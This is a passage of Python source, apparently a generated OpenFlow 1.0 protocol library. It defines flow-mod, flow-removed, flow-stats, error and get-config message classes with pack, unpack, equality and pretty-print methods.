        self.out_port = out_port if out_port is not None else 0
        self.flags = flags if flags is not None else 0
        self.actions = actions if actions is not None else []

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            self.match.pack(),
            struct.pack("!Q", self.cookie),
            util.pack_fm_cmd(self._command),
            struct.pack("!H", self.idle_timeout),
            struct.pack("!H", self.hard_timeout),
            struct.pack("!H", self.priority),
            struct.pack("!L", self.buffer_id),
            util.pack_port_no(self.out_port),
            struct.pack("!H", self.flags),
            loxi.generic_util.pack_list(self.actions),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = flow_add()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 14)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        msg.match = ofp.match.unpack(reader)
        msg.cookie = reader.read("!Q")[0]
        __command = util.unpack_fm_cmd(reader)
        assert(__command == 0)
        msg.idle_timeout = reader.read("!H")[0]
        msg.hard_timeout = reader.read("!H")[0]
        msg.priority = reader.read("!H")[0]
        msg.buffer_id = reader.read("!L")[0]
        msg.out_port = util.unpack_port_no(reader)
        msg.flags = reader.read("!H")[0]
        msg.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        for attr in ("xid", "match", "cookie", "idle_timeout", "hard_timeout",
                     "priority", "buffer_id", "out_port", "flags", "actions"):
            if getattr(self, attr) != getattr(other, attr): return False
        return True

    def pretty_print(self, q):
        q.text("flow_add {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("match = "); q.pp(self.match)
                q.text(","); q.breakable(); q.text("cookie = "); q.text("%#x" % self.cookie)
                q.text(","); q.breakable(); q.text("idle_timeout = "); q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable(); q.text("hard_timeout = "); q.text("%#x" % self.hard_timeout)
                q.text(","); q.breakable(); q.text("priority = "); q.text("%#x" % self.priority)
                q.text(","); q.breakable(); q.text("buffer_id = "); q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable(); q.text("out_port = "); q.text(util.pretty_port(self.out_port))
                q.text(","); q.breakable(); q.text("flags = "); q.text("%#x" % self.flags)
                q.text(","); q.breakable(); q.text("actions = "); q.pp(self.actions)
                q.breakable()
        q.text('}')

flow_mod.subtypes[0] = flow_add
class flow_delete(flow_mod):
    """flow_mod with command 3 (delete) — wire version 1."""
    version = 1
    type = 14
    _command = 3

    def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None,
                 hard_timeout=None, priority=None, buffer_id=None,
                 out_port=None, flags=None, actions=None):
        self.xid = xid
        self.match = match if match is not None else ofp.match()
        self.cookie = cookie if cookie is not None else 0
        self.idle_timeout = idle_timeout if idle_timeout is not None else 0
        self.hard_timeout = hard_timeout if hard_timeout is not None else 0
        self.priority = priority if priority is not None else 0
        self.buffer_id = buffer_id if buffer_id is not None else 0
        self.out_port = out_port if out_port is not None else 0
        self.flags = flags if flags is not None else 0
        self.actions = actions if actions is not None else []

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            self.match.pack(),
            struct.pack("!Q", self.cookie),
            util.pack_fm_cmd(self._command),
            struct.pack("!H", self.idle_timeout),
            struct.pack("!H", self.hard_timeout),
            struct.pack("!H", self.priority),
            struct.pack("!L", self.buffer_id),
            util.pack_port_no(self.out_port),
            struct.pack("!H", self.flags),
            loxi.generic_util.pack_list(self.actions),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = flow_delete()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 14)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        msg.match = ofp.match.unpack(reader)
        msg.cookie = reader.read("!Q")[0]
        __command = util.unpack_fm_cmd(reader)
        assert(__command == 3)
        msg.idle_timeout = reader.read("!H")[0]
        msg.hard_timeout = reader.read("!H")[0]
        msg.priority = reader.read("!H")[0]
        msg.buffer_id = reader.read("!L")[0]
        msg.out_port = util.unpack_port_no(reader)
        msg.flags = reader.read("!H")[0]
        msg.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        for attr in ("xid", "match", "cookie", "idle_timeout", "hard_timeout",
                     "priority", "buffer_id", "out_port", "flags", "actions"):
            if getattr(self, attr) != getattr(other, attr): return False
        return True

    def pretty_print(self, q):
        q.text("flow_delete {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("match = "); q.pp(self.match)
                q.text(","); q.breakable(); q.text("cookie = "); q.text("%#x" % self.cookie)
                q.text(","); q.breakable(); q.text("idle_timeout = "); q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable(); q.text("hard_timeout = "); q.text("%#x" % self.hard_timeout)
                q.text(","); q.breakable(); q.text("priority = "); q.text("%#x" % self.priority)
                q.text(","); q.breakable(); q.text("buffer_id = "); q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable(); q.text("out_port = "); q.text(util.pretty_port(self.out_port))
                q.text(","); q.breakable(); q.text("flags = "); q.text("%#x" % self.flags)
                q.text(","); q.breakable(); q.text("actions = "); q.pp(self.actions)
                q.breakable()
        q.text('}')

flow_mod.subtypes[3] = flow_delete
class flow_delete_strict(flow_mod):
    """flow_mod with command 4 (delete_strict) — wire version 1."""
    version = 1
    type = 14
    _command = 4

    def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None,
                 hard_timeout=None, priority=None, buffer_id=None,
                 out_port=None, flags=None, actions=None):
        self.xid = xid
        self.match = match if match is not None else ofp.match()
        self.cookie = cookie if cookie is not None else 0
        self.idle_timeout = idle_timeout if idle_timeout is not None else 0
        self.hard_timeout = hard_timeout if hard_timeout is not None else 0
        self.priority = priority if priority is not None else 0
        self.buffer_id = buffer_id if buffer_id is not None else 0
        self.out_port = out_port if out_port is not None else 0
        self.flags = flags if flags is not None else 0
        self.actions = actions if actions is not None else []

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            self.match.pack(),
            struct.pack("!Q", self.cookie),
            util.pack_fm_cmd(self._command),
            struct.pack("!H", self.idle_timeout),
            struct.pack("!H", self.hard_timeout),
            struct.pack("!H", self.priority),
            struct.pack("!L", self.buffer_id),
            util.pack_port_no(self.out_port),
            struct.pack("!H", self.flags),
            loxi.generic_util.pack_list(self.actions),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = flow_delete_strict()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 14)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        msg.match = ofp.match.unpack(reader)
        msg.cookie = reader.read("!Q")[0]
        __command = util.unpack_fm_cmd(reader)
        assert(__command == 4)
        msg.idle_timeout = reader.read("!H")[0]
        msg.hard_timeout = reader.read("!H")[0]
        msg.priority = reader.read("!H")[0]
        msg.buffer_id = reader.read("!L")[0]
        msg.out_port = util.unpack_port_no(reader)
        msg.flags = reader.read("!H")[0]
        msg.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        for attr in ("xid", "match", "cookie", "idle_timeout", "hard_timeout",
                     "priority", "buffer_id", "out_port", "flags", "actions"):
            if getattr(self, attr) != getattr(other, attr): return False
        return True

    def pretty_print(self, q):
        q.text("flow_delete_strict {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("match = "); q.pp(self.match)
                q.text(","); q.breakable(); q.text("cookie = "); q.text("%#x" % self.cookie)
                q.text(","); q.breakable(); q.text("idle_timeout = "); q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable(); q.text("hard_timeout = "); q.text("%#x" % self.hard_timeout)
                q.text(","); q.breakable(); q.text("priority = "); q.text("%#x" % self.priority)
                q.text(","); q.breakable(); q.text("buffer_id = "); q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable(); q.text("out_port = "); q.text(util.pretty_port(self.out_port))
                q.text(","); q.breakable(); q.text("flags = "); q.text("%#x" % self.flags)
                q.text(","); q.breakable(); q.text("actions = "); q.pp(self.actions)
                q.breakable()
        q.text('}')

flow_mod.subtypes[4] = flow_delete_strict
class flow_mod_failed_error_msg(error_msg):
    """OFPT_ERROR with err_type 3 (flow mod failed) — wire version 1.

    Carries a 16-bit error ``code`` plus the opaque offending ``data``.
    """
    version = 1
    type = 1
    err_type = 3

    def __init__(self, xid=None, code=None, data=None):
        self.xid = xid
        self.code = code if code is not None else 0
        self.data = data if data is not None else ''

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!H", self.err_type),
            struct.pack("!H", self.code),
            self.data,  # raw payload, appended verbatim
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = flow_mod_failed_error_msg()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        _err_type = reader.read("!H")[0]
        assert(_err_type == 3)
        msg.code = reader.read("!H")[0]
        # Everything remaining in the slice is the opaque error payload.
        msg.data = str(reader.read_all())
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.code != other.code: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        q.text("flow_mod_failed_error_msg {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("code = "); q.text("%#x" % self.code)
                q.text(","); q.breakable(); q.text("data = "); q.pp(self.data)
                q.breakable()
        q.text('}')

error_msg.subtypes[3] = flow_mod_failed_error_msg
class flow_modify(flow_mod):
    """OpenFlow 1.0 OFPT_FLOW_MOD message with command OFPFC_MODIFY (1)."""
    version = 1
    type = 14
    _command = 1

    def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.match = match if match is not None else ofp.match()
        self.cookie = cookie if cookie is not None else 0
        self.idle_timeout = idle_timeout if idle_timeout is not None else 0
        self.hard_timeout = hard_timeout if hard_timeout is not None else 0
        self.priority = priority if priority is not None else 0
        self.buffer_id = buffer_id if buffer_id is not None else 0
        self.out_port = out_port if out_port is not None else 0
        self.flags = flags if flags is not None else 0
        self.actions = actions if actions is not None else []

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(self.match.pack())
        packed.append(struct.pack("!Q", self.cookie))
        packed.append(util.pack_fm_cmd(self._command))
        packed.append(struct.pack("!H", self.idle_timeout))
        packed.append(struct.pack("!H", self.hard_timeout))
        packed.append(struct.pack("!H", self.priority))
        packed.append(struct.pack("!L", self.buffer_id))
        packed.append(util.pack_port_no(self.out_port))
        packed.append(struct.pack("!H", self.flags))
        packed.append(loxi.generic_util.pack_list(self.actions))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = flow_modify()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 14)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.match = ofp.match.unpack(reader)
        obj.cookie = reader.read("!Q")[0]
        __command = util.unpack_fm_cmd(reader)
        assert(__command == 1)
        obj.idle_timeout = reader.read("!H")[0]
        obj.hard_timeout = reader.read("!H")[0]
        obj.priority = reader.read("!H")[0]
        obj.buffer_id = reader.read("!L")[0]
        obj.out_port = util.unpack_port_no(reader)
        obj.flags = reader.read("!H")[0]
        obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.match != other.match: return False
        if self.cookie != other.cookie: return False
        if self.idle_timeout != other.idle_timeout: return False
        if self.hard_timeout != other.hard_timeout: return False
        if self.priority != other.priority: return False
        if self.buffer_id != other.buffer_id: return False
        if self.out_port != other.out_port: return False
        if self.flags != other.flags: return False
        if self.actions != other.actions: return False
        return True

    def pretty_print(self, q):
        """Render as "flow_modify { ... }" on pretty-printer q."""
        q.text("flow_modify {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("match = ")
                q.pp(self.match)
                q.text(","); q.breakable()
                q.text("cookie = ")
                q.text("%#x" % self.cookie)
                q.text(","); q.breakable()
                q.text("idle_timeout = ")
                q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable()
                q.text("hard_timeout = ")
                q.text("%#x" % self.hard_timeout)
                q.text(","); q.breakable()
                q.text("priority = ")
                q.text("%#x" % self.priority)
                q.text(","); q.breakable()
                q.text("buffer_id = ")
                q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable()
                q.text("out_port = ")
                q.text(util.pretty_port(self.out_port))
                q.text(","); q.breakable()
                q.text("flags = ")
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("actions = ")
                q.pp(self.actions)
            q.breakable()
        q.text('}')

# Register as the command-1 (modify) variant in flow_mod's dispatch table.
flow_mod.subtypes[1] = flow_modify
class flow_modify_strict(flow_mod):
    """OpenFlow 1.0 OFPT_FLOW_MOD message with command OFPFC_MODIFY_STRICT (2)."""
    version = 1
    type = 14
    _command = 2

    def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None, hard_timeout=None, priority=None, buffer_id=None, out_port=None, flags=None, actions=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.match = match if match is not None else ofp.match()
        self.cookie = cookie if cookie is not None else 0
        self.idle_timeout = idle_timeout if idle_timeout is not None else 0
        self.hard_timeout = hard_timeout if hard_timeout is not None else 0
        self.priority = priority if priority is not None else 0
        self.buffer_id = buffer_id if buffer_id is not None else 0
        self.out_port = out_port if out_port is not None else 0
        self.flags = flags if flags is not None else 0
        self.actions = actions if actions is not None else []

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(self.match.pack())
        packed.append(struct.pack("!Q", self.cookie))
        packed.append(util.pack_fm_cmd(self._command))
        packed.append(struct.pack("!H", self.idle_timeout))
        packed.append(struct.pack("!H", self.hard_timeout))
        packed.append(struct.pack("!H", self.priority))
        packed.append(struct.pack("!L", self.buffer_id))
        packed.append(util.pack_port_no(self.out_port))
        packed.append(struct.pack("!H", self.flags))
        packed.append(loxi.generic_util.pack_list(self.actions))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = flow_modify_strict()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 14)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.match = ofp.match.unpack(reader)
        obj.cookie = reader.read("!Q")[0]
        __command = util.unpack_fm_cmd(reader)
        assert(__command == 2)
        obj.idle_timeout = reader.read("!H")[0]
        obj.hard_timeout = reader.read("!H")[0]
        obj.priority = reader.read("!H")[0]
        obj.buffer_id = reader.read("!L")[0]
        obj.out_port = util.unpack_port_no(reader)
        obj.flags = reader.read("!H")[0]
        obj.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.match != other.match: return False
        if self.cookie != other.cookie: return False
        if self.idle_timeout != other.idle_timeout: return False
        if self.hard_timeout != other.hard_timeout: return False
        if self.priority != other.priority: return False
        if self.buffer_id != other.buffer_id: return False
        if self.out_port != other.out_port: return False
        if self.flags != other.flags: return False
        if self.actions != other.actions: return False
        return True

    def pretty_print(self, q):
        """Render as "flow_modify_strict { ... }" on pretty-printer q."""
        q.text("flow_modify_strict {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("match = ")
                q.pp(self.match)
                q.text(","); q.breakable()
                q.text("cookie = ")
                q.text("%#x" % self.cookie)
                q.text(","); q.breakable()
                q.text("idle_timeout = ")
                q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable()
                q.text("hard_timeout = ")
                q.text("%#x" % self.hard_timeout)
                q.text(","); q.breakable()
                q.text("priority = ")
                q.text("%#x" % self.priority)
                q.text(","); q.breakable()
                q.text("buffer_id = ")
                q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable()
                q.text("out_port = ")
                q.text(util.pretty_port(self.out_port))
                q.text(","); q.breakable()
                q.text("flags = ")
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("actions = ")
                q.pp(self.actions)
            q.breakable()
        q.text('}')

# Register as the command-2 (modify-strict) variant in flow_mod's dispatch table.
flow_mod.subtypes[2] = flow_modify_strict
class flow_removed(message):
    """OpenFlow 1.0 OFPT_FLOW_REMOVED (type 11) async notification.

    Sent by the switch when a flow entry is removed; reports the match,
    removal reason, lifetime and traffic counters of the expired flow.
    """
    version = 1
    type = 11

    def __init__(self, xid=None, match=None, cookie=None, priority=None, reason=None, duration_sec=None, duration_nsec=None, idle_timeout=None, packet_count=None, byte_count=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.match = match if match is not None else ofp.match()
        self.cookie = cookie if cookie is not None else 0
        self.priority = priority if priority is not None else 0
        self.reason = reason if reason is not None else 0
        self.duration_sec = duration_sec if duration_sec is not None else 0
        self.duration_nsec = duration_nsec if duration_nsec is not None else 0
        self.idle_timeout = idle_timeout if idle_timeout is not None else 0
        self.packet_count = packet_count if packet_count is not None else 0
        self.byte_count = byte_count if byte_count is not None else 0

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(self.match.pack())
        packed.append(struct.pack("!Q", self.cookie))
        packed.append(struct.pack("!H", self.priority))
        packed.append(struct.pack("!B", self.reason))
        packed.append('\x00' * 1)  # pad
        packed.append(struct.pack("!L", self.duration_sec))
        packed.append(struct.pack("!L", self.duration_nsec))
        packed.append(struct.pack("!H", self.idle_timeout))
        packed.append('\x00' * 2)  # pad
        packed.append(struct.pack("!Q", self.packet_count))
        packed.append(struct.pack("!Q", self.byte_count))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = flow_removed()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 11)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.match = ofp.match.unpack(reader)
        obj.cookie = reader.read("!Q")[0]
        obj.priority = reader.read("!H")[0]
        obj.reason = reader.read("!B")[0]
        reader.skip(1)  # pad
        obj.duration_sec = reader.read("!L")[0]
        obj.duration_nsec = reader.read("!L")[0]
        obj.idle_timeout = reader.read("!H")[0]
        reader.skip(2)  # pad
        obj.packet_count = reader.read("!Q")[0]
        obj.byte_count = reader.read("!Q")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.match != other.match: return False
        if self.cookie != other.cookie: return False
        if self.priority != other.priority: return False
        if self.reason != other.reason: return False
        if self.duration_sec != other.duration_sec: return False
        if self.duration_nsec != other.duration_nsec: return False
        if self.idle_timeout != other.idle_timeout: return False
        if self.packet_count != other.packet_count: return False
        if self.byte_count != other.byte_count: return False
        return True

    def pretty_print(self, q):
        """Render as "flow_removed { ... }" on pretty-printer q."""
        q.text("flow_removed {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("match = ")
                q.pp(self.match)
                q.text(","); q.breakable()
                q.text("cookie = ")
                q.text("%#x" % self.cookie)
                q.text(","); q.breakable()
                q.text("priority = ")
                q.text("%#x" % self.priority)
                q.text(","); q.breakable()
                q.text("reason = ")
                q.text("%#x" % self.reason)
                q.text(","); q.breakable()
                q.text("duration_sec = ")
                q.text("%#x" % self.duration_sec)
                q.text(","); q.breakable()
                q.text("duration_nsec = ")
                q.text("%#x" % self.duration_nsec)
                q.text(","); q.breakable()
                q.text("idle_timeout = ")
                q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable()
                q.text("packet_count = ")
                q.text("%#x" % self.packet_count)
                q.text(","); q.breakable()
                q.text("byte_count = ")
                q.text("%#x" % self.byte_count)
            q.breakable()
        q.text('}')

# Register in message's dispatch table keyed on message type.
message.subtypes[11] = flow_removed
class flow_stats_reply(stats_reply):
    """OpenFlow 1.0 OFPST_FLOW stats reply (type 17, stats_type 1).

    ``entries`` is a list of flow_stats_entry objects.
    """
    version = 1
    type = 17
    stats_type = 1

    def __init__(self, xid=None, flags=None, entries=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.flags = flags if flags is not None else 0
        self.entries = entries if entries is not None else []

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = flow_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 1)
        obj.flags = reader.read("!H")[0]
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.flow_stats_entry.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.entries != other.entries: return False
        return True

    def pretty_print(self, q):
        """Render as "flow_stats_reply { ... }" on pretty-printer q."""
        q.text("flow_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ")
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("entries = ")
                q.pp(self.entries)
            q.breakable()
        q.text('}')

# Register in stats_reply's dispatch table keyed on stats_type.
stats_reply.subtypes[1] = flow_stats_reply
class flow_stats_request(stats_request):
    """OpenFlow 1.0 OFPST_FLOW stats request (type 16, stats_type 1)."""
    version = 1
    type = 16
    stats_type = 1

    def __init__(self, xid=None, flags=None, match=None, table_id=None, out_port=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.flags = flags if flags is not None else 0
        self.match = match if match is not None else ofp.match()
        self.table_id = table_id if table_id is not None else 0
        self.out_port = out_port if out_port is not None else 0

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(self.match.pack())
        packed.append(struct.pack("!B", self.table_id))
        packed.append('\x00' * 1)  # pad
        packed.append(util.pack_port_no(self.out_port))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = flow_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 1)
        obj.flags = reader.read("!H")[0]
        obj.match = ofp.match.unpack(reader)
        obj.table_id = reader.read("!B")[0]
        reader.skip(1)  # pad
        obj.out_port = util.unpack_port_no(reader)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.match != other.match: return False
        if self.table_id != other.table_id: return False
        if self.out_port != other.out_port: return False
        return True

    def pretty_print(self, q):
        """Render as "flow_stats_request { ... }" on pretty-printer q."""
        q.text("flow_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ")
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("match = ")
                q.pp(self.match)
                q.text(","); q.breakable()
                q.text("table_id = ")
                q.text("%#x" % self.table_id)
                q.text(","); q.breakable()
                q.text("out_port = ")
                q.text(util.pretty_port(self.out_port))
            q.breakable()
        q.text('}')

# Register in stats_request's dispatch table keyed on stats_type.
stats_request.subtypes[1] = flow_stats_request
class get_config_reply(message):
    """OpenFlow 1.0 OFPT_GET_CONFIG_REPLY (type 8)."""
    version = 1
    type = 8

    def __init__(self, xid=None, flags=None, miss_send_len=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.flags = flags if flags is not None else 0
        self.miss_send_len = miss_send_len if miss_send_len is not None else 0

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.flags))
        packed.append(struct.pack("!H", self.miss_send_len))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = get_config_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 8)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.flags = reader.read("!H")[0]
        obj.miss_send_len = reader.read("!H")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
